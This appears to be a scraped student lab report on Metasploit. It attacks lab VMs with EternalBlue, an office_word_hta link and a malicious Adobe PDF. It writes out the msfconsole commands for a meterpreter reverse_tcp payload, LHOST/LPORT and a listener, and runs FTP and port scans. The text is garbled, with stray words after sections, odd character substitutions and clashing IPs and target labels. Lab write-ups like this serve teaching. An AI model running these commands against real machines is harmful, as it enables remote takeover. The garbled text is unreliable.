2018-2019 20165235 網絡對抗 Exp5 MSF基礎

2018-2019 20165235 網絡對抗 Exp5 MSF基礎

1. 實踐內容(3.5分)

1.1一個主動攻擊實踐

攻擊方:kali 192.168.21.130
靶機: win7 192.168.21.128
永恆之藍漏洞是利用框架中一個針對SMB服務進行攻擊的漏洞,該漏洞致使攻擊者在目標系統上能夠執行任意代碼。
進入msfconsole輸入 use exploit/windows/smb/ms17_010_eternalblue。而且經過show payloads 顯示可用攻擊載荷。

設置tcp反向鏈接:

設置參數:

輸入:exploit

滲透成功:
sql

1.2 一個針對瀏覽器的攻擊

攻擊方:kali 192.168.21.130
靶機: win7 192.168.21.128
咱們先啓動msfconsole並使用模塊use exploit/windows/fileformat/office_word_hta

查看目標show targets

show options,能夠看到已經默認幫咱們配置好了,咱們只須要run執行便可,相應的產生了一個URL。

在靶機的IE瀏覽器中輸入KALI中生成的URL,出現一個窗口,點擊運行便可:

看到kali那裏已經產生了session會話,咱們按下回車回到命令行,使用sessions -i 1來與第一個session創建鏈接,再輸入shell拿到權限:

輸入指令測試,滲透陳成功:
shell

1.3 一個針對客戶端的攻擊(Adobe)

本次實驗在win7中實驗並無成功,因而我將靶機換成XP系統。
查看靶機ip:

kali輸入msfconsole進入控制檯,依次輸入如下命令
攻擊方:kali 192.168.21.130
靶機: win7 192.168.21.131
use windows/fileformat/adobe_cooltype_sing :選擇攻擊模塊
set payload windows/meterpreter/reverse_tcp :設置tcp反向鏈接
set LHOST 192.168.21.130 :kali IP
set LPORT 5235 :設置攻擊端口
set FILENAME 20165235.pdf :設置生成的pdf文件名
exploit:發起攻擊

我是第二次作的時候截的屏,因此沒有顯示文件路徑。將20165235.pdf複製到XP中。重啓控制檯,而且輸入如下命令進入監聽模塊:
use exploit/multi/handler:進入監聽模塊
set payload windows/meterpreter/reverse_tcp :設置tcp反向鏈接
set LHOST 10.0.0.138 :kali IP
set LPORT 5330:設置攻擊端口
exploit :監聽

接着在XP中打開20165235.pdf文件:

滲透成功:

關閉20165235.pdf,鏈接斷開:
數據庫

1.4 成功應用任何一個輔助模塊。

auxiliary/scanner/ftp/ftp_version

攻擊方:kali 192.168.21.130
靶機: win7 192.169.21.128
本次的模塊是經過MSF滲透幫助手冊中找到的。功能是能夠查詢到某一網段中的ftp服務器以及其操做系統的類型。
首先在win7中搭建一個ftp服務器,具體的過程能夠上網查找。一下是搭建好的ftp服務器:

測試ftp服務器是否可用:

進入msfconsole,輸入use auxiliary/scanner/ftp/ftp_version,設置要掃描的網段範圍:set RHOSTS 192.168.21.1-254,設置線程數:set THREADS 55,(線程數是每次掃描的主機個數。),直接輸入run便可看到結果:192.168.21.128:被掃描出來,並分析出是微軟的Windows操做系統。
windows

auxiliary/scanner/portscan/tcp

攻擊方:kali 192.168.21.130
靶機: win7 192.168.21.128
建立msf所需的數據庫:
service postgresql start
msfdb start
進入msfconsole,使用auxiliary/scanner/portscan/tcp模塊,用來掃描靶機的TCP端口使用狀況。執行命令use auxiliary/scanner/portscan/tcp進入並使用模塊:輸入show options查看須要設置的參數信息:

設置參數:set RHOSTS 192.168.21.128set PROTS 1 - 5235(掃描1到5235端口),以後使用run,進行掃描。
瀏覽器

2 報告內容:

2.1.基礎問題回答

(1)用本身的話解釋什麼是exploit,payload,encode.

  • exploit:exploit字面上的意思是「開拓、開發」,exploit就是利用一切能夠利用的工具、採用一切能夠採用的方法、找到一切能夠找到的漏洞,而且經過對漏洞資料的分析研究,從而達到獲取網站用戶資料文檔、添加自定義用戶、甚至侵入網站得到管理員權限控制整個網站的最終目的。可是在MSF中,exploit將負責攻擊的代碼payload傳送到靶機中。
  • payload:payload是指:有效載荷。它是靶機被滲透攻擊以後執行的惡意代碼。
  • encode:是編碼的意思。將payload進行屢次編碼後,使改變其形態。服務器

    2.2.實踐總結與體會

    經過本次的實踐,學會了利用MSF進行多種方式的滲透,不敢說能靈活應用而且實戰,可是學到了很多東西。在進行實驗時,網上的資料太少,並且對好多模塊並不知道它的意思以及用法,因而我就翻出它的英文幫助手冊,利用翻譯軟件看懂了使用方法。在之後的學習過程當中必定要活學活用。網絡

    2.3.離實戰還缺些什麼技術或步驟

    首先是攻擊手法單一,應用不靈活,在實戰中要求使用多種方法,學會去掃描靶機的漏洞以及可用的端口等。要真正的應用於實戰就要咱們能靈活的使用MSF提供的大部分的攻擊手段,同時也得學會使用其餘的攻擊平臺。session

相關文章
相關標籤/搜索